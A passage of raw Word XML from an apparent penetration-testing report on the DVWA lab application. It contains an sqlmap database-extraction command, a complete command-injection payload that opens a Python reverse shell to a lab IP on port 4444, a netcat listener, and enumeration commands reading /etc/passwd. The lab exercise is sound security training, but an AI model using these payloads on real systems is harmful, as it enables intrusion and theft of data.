          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> for automated database extraction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A521BDF" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Command Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B03FE80" w14:textId="56F7D86D" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B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14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u</w:t>
      </w:r>
      <w:r w:rsidR="007864B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"http://192.168.227.128/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334728BA" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B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14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>--cookie="PHPSESSID=&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>session_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;; security=low" --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06DC68E9" w14:textId="77777777" w:rsidR="00572A20" w:rsidRDefault="00572A20" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00572A20">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ED40BB5" wp14:editId="524FEC58">
            <wp:extent cx="5943600" cy="3007995"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1186155015" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D75FA34B-CC95-405B-9FA1-295D3815CD6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6155015" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3007995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73909E85" w14:textId="77777777" w:rsidR="00236891" w:rsidRDefault="00236891" w:rsidP="004F0197">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F29134" w14:textId="568F704A" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>5.1.3 Remote Code Execution via Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B95C24" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The command injection vulnerability within DVWA permitted arbitrary operating system command execution through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>unsanitised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell command concatenation [24].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5710D2A1" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Exploitation Payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EF594D" w14:textId="77777777" w:rsidR="006218ED" w:rsidRPr="006218ED" w:rsidRDefault="006218ED" w:rsidP="007864B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14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6D4693" w14:textId="4041C699" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="006218ED" w:rsidP="007864B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kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>127.0.0.1; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.227.131",4444));os.dup2(s.fileno(),0); os.dup2(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>s.fileno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>(),1); os.dup2(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>s.fileno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>(),2);p=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>subprocess.call</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>(["/bin/bash","-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006218ED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"]);'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A39584E" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener established on attacking machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FD9F8C" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D78699B" w14:textId="1D4220BD" w:rsidR="006218ED" w:rsidRDefault="006218ED" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79DCE1EC" wp14:editId="29D40642">
            <wp:extent cx="5943600" cy="3129280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1836831559" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{333C7FA1-FAB1-4091-AC29-B1D950CEB04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831559" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3129280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA12DC3" w14:textId="77777777" w:rsidR="00236891" w:rsidRDefault="00236891" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B0A767" w14:textId="68C172A6" w:rsidR="006218ED" w:rsidRPr="00A000BA" w:rsidRDefault="009E658F"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9E658F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="605846E9" wp14:editId="78FFDBD8">
            <wp:extent cx="5943600" cy="887095"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="288047787" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31F51417-692F-4B4D-A3D4-F04BA2F2E6D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8047787" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="887095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D49BC4E" w14:textId="77777777" w:rsidR="00236891" w:rsidRDefault="00236891" w:rsidP="004F0197">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C5BDF7" w14:textId="0E1E5905" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Post-Exploitation Enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1584A0" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8DA412" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDC3E5A" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2550C72F" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
